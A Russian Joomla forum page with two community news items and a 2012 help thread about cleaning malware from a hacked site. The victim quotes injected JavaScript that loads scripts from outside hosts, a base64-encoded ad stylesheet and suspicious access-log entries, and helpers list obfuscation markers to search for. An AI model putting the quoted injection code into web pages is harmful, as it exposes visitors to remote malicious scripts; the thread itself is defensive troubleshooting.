Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 18 Ответов
  • 2625 Просмотров
*

Doran

  • Захожу иногда
  • 104
  • 0 / 0
Вирус
« : 25.03.2012, 01:49:25 »
Несколько недель назад заметил вирус на сайте: шел редирект с мобильных устройств. Изменили хтачесс. Хтачесс поправил. С помощью сканера нашел файлы. Удалил. Потом снова появились! Удалил. Вроде пару дней нормально было. Сегодня зашел через хром и увидел ерунду на сайте: висит картинка-ссылка на traffbiz.ru. Не могу понять откуда грузит ее и как найти вирусняк?

Может кто подскажет умные мысли?
*

eclipseggg

  • Захожу иногда
  • 410
  • 32 / 2
Re: Вирус
« Ответ #1 : 25.03.2012, 01:59:01 »
права на папки вот тебе и все мысли + у тебя файлообменников никаких нет на сайте?
*

Doran

  • Захожу иногда
  • 104
  • 0 / 0
Re: Вирус
« Ответ #2 : 25.03.2012, 02:01:46 »
права нормально выставлены, файлообменников нет
*

nixsystem

  • Захожу иногда
  • 207
  • 10 / 0
Re: Вирус
« Ответ #3 : 25.03.2012, 02:04:44 »
Искать по всем файлам конструкции вида
Код: php-brief
eval(base64_decode
Для этих целей можно пользоваться скриптом отсюда.
Если ничего найдено не будет, то следует поискать строки вида
Код: php
3PL1i5wEnN8bzhp9YBf3LC9OwjCMRu78Sjot6ZBFLffOlE0D8L+Ntv1JtNZzOKbqduailQ2ccb8q61nR7MuDBa7dvyZ27Lbbbu9u4mY4R
только не именно такую строку, а строку без пробелов более 10-15 символов длинной.
Ну и само собой смотреть логи Apache, access.log в частности. Там должно быть видно к какому фалу обращались, если на сайте есть шел или бекдор.
*

Doran

  • Захожу иногда
  • 104
  • 0 / 0
Re: Вирус
« Ответ #4 : 25.03.2012, 02:16:14 »
а как искать строку более 10 символов?
*

eclipseggg

  • Захожу иногда
  • 410
  • 32 / 2
Re: Вирус
« Ответ #5 : 25.03.2012, 02:18:50 »
лучше начни с логов
*

nixsystem

  • Захожу иногда
  • 207
  • 10 / 0
Re: Вирус
« Ответ #6 : 25.03.2012, 02:44:16 »
Не знаю работают ли скрипты по ссылке выше с регулярными выражениями - не пользовался.
Чтобы искать строку более n символов нужно
1. скачать сайт на локальный компьютер (предварительно упаковав в архив на хостинге, так гораздо быстрее)
2. скачать (если нет) Notepad++ (по ссылке английский)
3. распаковать сайт в любою папку на компе
4. открыть Notepad++, нажать Ctrl+F, Настроить так
   Вкладка Find in files
   Find what: "[0-z][0-z][0-z][0-z][0-z][0-z][0-z][0-z][0-z][0-z][0-z][0-z]0-z][0-z][0-z]" (писать в поле без кавычек, [0-z] - соответствует одной любой цифре или латинскому симовлу)
   Filters: *.*
   Directory: (указываете путь до папки куда распаковали архив с сайтом)
   Search mode (рамка внизу окна): Regular Expression
Find All

В файлах *.js могут встречаться длинные строки, это нормально, если не встречается строка
Код: javascript
=Array.prototype.slice.call(arguments).join("")
в файлах php таких строк быть не должно.

Если что-то найдется, но будут сомнения - выкладывай сюда.
« Последнее редактирование: 25.03.2012, 02:47:20 от nixsystem »
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Вирус
« Ответ #7 : 25.03.2012, 13:13:26 »
ищите дыру. Access log смотрите.
*

eclipseggg

  • Захожу иногда
  • 410
  • 32 / 2
Re: Вирус
« Ответ #8 : 25.03.2012, 21:06:45 »
опыт у всех есть , человек вроде как хочет научится сам
*

Doran

  • Захожу иногда
  • 104
  • 0 / 0
Re: Вирус
« Ответ #9 : 26.03.2012, 12:24:44 »
Вот такая ересь вписывается. Через файрбаг запалил. Найти не могу

Код
<link href="data:text/css;base64,LmRmZm1fdGFibGUNCnsNCiAgbWFyZ2luOiAwcHggIWltcG9ydGFudDsgDQogIHBhZGRpbmc6IDBweCAhaW1wb3J0YW50Ow0KICBkaXNwbGF5OiBpbmxpbmUtdGFibGUgIWltcG9ydGFudDsNCiAgdmVydGljYWwtYWxpZ246IGJvdHRvbSAhaW1wb3J0YW50Ow0KICBib3JkZXItc3BhY2luZzogMHB4ICFpbXBvcnRhbnQ7DQogIGJvcmRlci1zdHlsZTogbm9uZSAhaW1wb3J0YW50Ow0KICB3aWR0aDogYXV0byAhaW1wb3J0YW50Ow0KfQ0KDQouZGZmbV9sZWZ0X2NlbGwNCnsNCiAgcGFkZGluZzogMHB4ICFpbXBvcnRhbnQ7DQogIG1hcmdpbjogMHB4ICFpbXBvcnRhbnQ7DQogIHRleHQtYWxpZ246IHJpZ2h0ICFpbXBvcnRhbnQ7DQogIGJvcmRlci1zdHlsZTogbm9uZSAhaW1wb3J0YW50Ow0KICB0ZXh0LWRlY29yYXRpb246IG5vbmUgIWltcG9ydGFudDsNCn0NCg0KLmRmZm1fbWlkZGxlX2NlbGwNCnsNCiAgcGFkZGluZzogMHB4ICFpbXBvcnRhbnQ7IA0KICBtYXJnaW46IDBweCAhaW1wb3J0YW50Ow0KICBiYWNrZ3JvdW5kLWltYWdlOiB1cmwoJ2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCwiaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQU80QUFBQVJDQVlBQUFEYUtwRHVBQUFBR1hSRldIUlRiMlowZDJGeVpRQkJaRzlpWlNCSmJXRm5aVkpsWVdSNWNjbGxQQUFBQVFGSlJFRlVlTnJzbStzT2dqQU1SanN2VVJNZnl2ZC9JbzJYQ2dsQkVSZ3RZd0xKT2NrQ1pWMDMyTDZ4UHcyaWtnM05HUnhnQlFRSnB6eHhWUzROclpYUCt1MjJOai8xV3NmczlwT0IyQ2w5enhIUHY0K2xqUmM3My94WjF1ZTFLSThKNWoybHZoN25yaVhrdUMyUittRDBzL2JsNlh1T2VQNU5FbnVwODJkWm44Y2wvY2szSEdZQTFnZkNCVUM0QUlCd0FRRGhBaUJjQUVDNEFJQndBUkF1QUNCY0FFQzRBQWdYQUZZb1hQMjUxMGg5ekwvTHp4TTd0MytxclluK3NmYWEyTitZOXQ3eC9QdDdlY2VqRHYreDcyZGxxbmxvMkdWYVg2NnNoME5SYnB3UUZzdEw0cW1ZMEdadjlMdFgxMmQxM1JibC9DVzh2dlJCYy9yclc0QUJBSXFEa0U4ek5ZWWxBQUFBQUVsRlRrU3VRbUNDIicpICFpbXBvcnRhbnQ7DQogIGJvcmRlci1zdHlsZTogbm9uZSAhaW1wb3J0YW50Ow0KfQ0KDQouZGZmbV9yaWdodF9jZWxsDQp7DQogIHBhZGRpbmc6IDBweCAhaW1wb3J0YW50Ow0KICBtYXJnaW46IDBweCAhaW1wb3J0YW50Ow0KICB0ZXh0LWFsaWduOiBsZWZ0ICFpbXBvcnRhbnQ7DQogIGJvcmRlci1zdHlsZTogbm9uZSAhaW1wb3J0YW50Ow0KICB0ZXh0LWRlY29yYXRpb246IG5vbmUgIWltcG9ydGFudDsNCn0NCg0KLmRmZm1fbGVmdF9pbWcNCnsNCiAgY3Vyc29yOiBwb2ludGVyICFpbXBvcnRhbnQ7DQp9DQoNCi5kZmZtX3JpZ2h0X2ltZw0Kew0KICBjdXJzb3I6IHBvaW50ZXIgIWltcG9ydGFudDsNCn0NCg==" id="depositfiles_css" charset="utf-8" rel="stylesheet" type="text/css"/>

С поиском 10 и более символов не помогло
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
*

Doran

  • Захожу иногда
  • 104
  • 0 / 0
Re: Вирус
« Ответ #11 : 26.03.2012, 17:53:16 »
Сканерами уже искал
*

Doran

  • Захожу иногда
  • 104
  • 0 / 0
Re: Вирус
« Ответ #12 : 26.03.2012, 18:32:44 »
Если расшифровать

Код
.dffm_table
{
  margin: 0px !important;
  padding: 0px !important;
  display: inline-table !important;
  vertical-align: bottom !important;
  border-spacing: 0px !important;
  border-style: none !important;
  width: auto !important;
}

.dffm_left_cell
{
  padding: 0px !important;
  margin: 0px !important;
  text-align: right !important;
  border-style: none !important;
  text-decoration: none !important;
}

.dffm_middle_cell
{
  padding: 0px !important;
  margin: 0px !important;
  background-image: url('data:image/png;base64,"iVBORw0KGgoAAAANSUhEUgAAAO4AAAARCAYAAADaKpDuAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAQFJREFUeNrsm+sOgjAMRjsvURMfyvd/Io2XCglBERgtYwLJOckCZV032L6xPw2ikg3NGRxgBQQJpzxxVS4NrZXP+u22Nj/1Wsfs9pOB2Cl9zxHPv4+ljRc73/xZ1ue1KI8J5j2lvh7nriXkuC2R+mD0s/bl6XuOeP5NEnup82dZn8cl/ck3HGYA1gfCBUC4AIBwAQDhAiBcAEC4AIBwARAuACBcAEC4AAgXAFYoXP2510h9zL/LzxM7t3+qrYn+sfaa2N+Y9t7x/Pt7ecejDv+x72dlqnlo2GVaX66sh0NRbpwQFstL4qmY0GZv9LtX12d13Rbl/CW8vvRBc/rrW4ABAIqDkE8zNYYlAAAAAElFTkSuQmCC"')!important;
  border-style: none !important;
}

.dffm_right_cell
{
  padding: 0px !important;
  margin: 0px !important;
  text-align: left !important;
  border-style: none !important;
  text-decoration: none !important;
}

.dffm_left_img
{
  cursor: pointer !important;
}

.dffm_right_img
{
  cursor: pointer !important;
}
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Вирус
« Ответ #13 : 26.03.2012, 18:55:55 »
Это все искал ?
______
eval
base64_decode
gzuncompress
gzinflate
ob_start
str_rot13
______
*

Doran

  • Захожу иногда
  • 104
  • 0 / 0
Re: Вирус
« Ответ #14 : 26.03.2012, 18:58:42 »
Еще забыл написать, в js файле обнаружил такую фигню
Код
document.write('<sc' + 'ript language="JavaScript" ' + 
'src="http://ferest.ru/38931/img3.jpg"></sc' +
'ript>')
 
var url = 'http://may.is-by.us';
document.write('<sc' + 'ript language="JavaScript" ' +
'src="' + url + '/2095/counter.xhtml"></sc' +
'ript>')

файрбагом спалил ссылки.
« Последнее редактирование: 26.03.2012, 19:03:32 от Doran »
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Вирус
« Ответ #15 : 26.03.2012, 19:04:08 »
попробуй
http://vms.drweb.com/online (вверху Проверить ссылку (URL))
*

Doran

  • Захожу иногда
  • 104
  • 0 / 0
Re: Вирус
« Ответ #16 : 11.04.2012, 16:19:19 »
Цитировать
ищите дыру. Access log смотрите.


а как в Access log найти дыру?
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Вирус
« Ответ #17 : 11.04.2012, 17:32:11 »
По идее в Access log можно найти время изменения файла и прочую информацию и узнать потом, что произошло.
*

Doran

  • Захожу иногда
  • 104
  • 0 / 0
Re: Вирус
« Ответ #18 : 11.04.2012, 20:56:36 »
Такие записи...

Код
199.15.234.75 - - [10/Apr/2012:23:20:47 +0400] "POST /includes/ HTTP/1.0" 200 16514 "http://site.ru/includes/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2" 

199.15.234.75 - - [10/Apr/2012:23:21:02 +0400] "GET /libraries/geshi/geshi/mysql.php HTTP/1.0" 200 16896 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2"
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 4291
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5554
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3885
Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

Ответов: 13
Просмотров: 2487
Последний ответ 16.05.2021, 18:52:24
от alekcae
На сайте появился вирус

Автор Lifar

Ответов: 3
Просмотров: 1496
Последний ответ 23.04.2021, 10:12:05
от ProtectYourSite